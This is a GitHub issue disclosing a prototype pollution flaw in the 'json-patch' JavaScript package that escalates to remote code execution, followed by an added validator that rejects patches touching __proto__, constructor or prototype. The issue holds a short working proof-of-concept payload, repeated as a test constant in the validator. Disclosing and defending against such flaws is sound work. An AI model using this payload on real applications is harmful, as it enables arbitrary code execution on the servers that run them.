
Prototype pollution / RCE vulnerability

Open alxbrsn opened this issue 5 years ago • 0 comments

The code is vulnerable to prototype pollution, because it allows patching __proto__. This can be escalated to remote code execution if user-supplied input is passed as the patch list:

const p = require('json-patch');

p.apply({}, [
  {
    "op": "copy",
    "from": "/constructor/constructor",
    "path": "/__proto__/makeFunc"
  },
  {
    "op": "add",
    "path": "/__proto__/op",
    "value": "makeFunc"
  }
]);

p.apply({}, ["console.log('rce')"]); // rce

In order to prevent this, I would advise filtering out any changes to __proto__.

alxbrsn Jun 28 '20 07:06
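One way to implement the filtering the issue recommends, as an added example that is neither the json-patch project's code nor the reporter's: every operation's `path` and `from` pointer is parsed per RFC 6901 and rejected if any segment is a prototype-related key. It goes slightly beyond the issue's advice by also blocking `constructor` and `prototype` segments (the `FORBIDDEN_SEGMENTS` set and the `safeApply` wrapper, which takes whatever `apply(doc, patch)` implementation the caller supplies, are this example's own names).

```javascript
// Added example (not the json-patch project's code nor the issue author's): refuse
// JSON Patch operations whose pointer reaches prototype keys before calling apply().
// RFC 6901 parsing: split on "/" and unescape ~1 -> "/" then ~0 -> "~" (that order).
function parsePointer(pointer) {
  if (pointer === '') return [];
  if (typeof pointer !== 'string' || pointer[0] !== '/') {
    throw new TypeError(`invalid JSON Pointer: ${JSON.stringify(pointer)}`);
  }
  return pointer.slice(1).split('/')
    .map(seg => seg.replace(/~1/g, '/').replace(/~0/g, '~'));
}
// The issue advises blocking __proto__; "constructor" and "prototype" are blocked
// too, since /constructor/prototype/... reaches the same shared objects.
const FORBIDDEN_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);
function pointerIsSafe(pointer) {
  return parsePointer(pointer).every(seg => !FORBIDDEN_SEGMENTS.has(seg));
}
// Returns a list of problems; empty means the patch may be applied. Both "path"
// and "from" are checked, because copy/move read through "from".
function validatePatch(patch) {
  if (!Array.isArray(patch)) return ['patch must be an array of operations'];
  const problems = [];
  patch.forEach((op, i) => {
    if (op === null || typeof op !== 'object' || typeof op.op !== 'string') {
      problems.push(`op ${i}: not an operation object`);
      return;
    }
    for (const field of ['path', 'from']) {
      if (!(field in op)) continue;
      try {
        if (!pointerIsSafe(op[field])) {
          problems.push(`op ${i}: ${field} ${JSON.stringify(op[field])} touches a prototype key`);
        }
      } catch (e) { problems.push(`op ${i}: ${e.message}`); }
    }
  });
  return problems;
}
// Gate any apply(doc, patch) implementation (caller-supplied) behind validation.
function safeApply(apply, doc, patch) {
  const problems = validatePatch(patch);
  if (problems.length > 0) throw new Error(`rejected patch: ${problems.join('; ')}`);
  return apply(doc, patch);
}
// Constructed inputs: the two-step patch reported in this issue and a benign one.
const POLLUTING_PATCH = [
  { op: 'copy', from: '/constructor/constructor', path: '/__proto__/makeFunc' },
  { op: 'add', path: '/__proto__/op', value: 'makeFunc' },
];
const BENIGN_PATCH = [{ op: 'add', path: '/a~1b', value: 1 }];
```

Note that the second call in the report passes a bare string as an operation; `validatePatch` rejects that too, because each element must be an object with a string `op`.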